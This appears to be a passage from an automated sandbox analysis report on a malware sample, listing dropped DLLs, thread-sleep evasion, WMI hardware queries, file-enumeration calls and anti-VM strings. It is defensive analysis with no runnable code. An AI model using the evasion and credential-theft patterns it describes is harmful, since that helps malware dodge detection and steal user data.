Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ougwwmmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5mc.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	API coverage: 6.6 %
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	API coverage: 1.7 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7208	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7208	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -51308s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -56238s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7208	Thread sleep time: -59843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -45374s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7208	Thread sleep time: -59687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7208	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -55950s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -35499s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -43722s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -50809s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -48738s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -38011s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -31617s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -43087s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -57604s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7556	Thread sleep time: -660000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -40805s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -46612s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -53255s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -33770s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7552	Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -50653s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -47852s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -54405s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -58653s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -55572s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -31574s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -50025s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -33080s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -56061s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -57238s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -33880s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -50540s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -54811s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -30579s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -59547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -42623s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -51696s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -38041s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -38648s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -32342s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -45989s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -33486s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -30816s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -57979s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -52175s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -53453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -54401s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -50748s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -56285s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -40668s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -47390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -39018s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -38924s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -33431s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -55039s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -42082s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -51425s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -57169s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -40897s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -39331s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -39072s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -34618s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -37346s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -57042s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -49490s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -30647s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7120	Thread sleep time: -32893s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7992	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe TID: 4456	Thread sleep count: 7910 > 30
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe TID: 4456	Thread sleep time: -5624010s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe TID: 4456	Thread sleep count: 2088 > 30
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe TID: 4456	Thread sleep time: -1484568s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C26261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C26261E

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38011
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31617
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43087
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53255
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56061
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54811
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38041
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52175
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56285
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51425
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37346
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30647
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32893
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local\Temp\u5mc.2	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u5mc.3.exe, 00000005.00000002.2124129188.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2129887694.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: u5mc.0.exe, 00000001.00000002.2129887694.000000000427A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
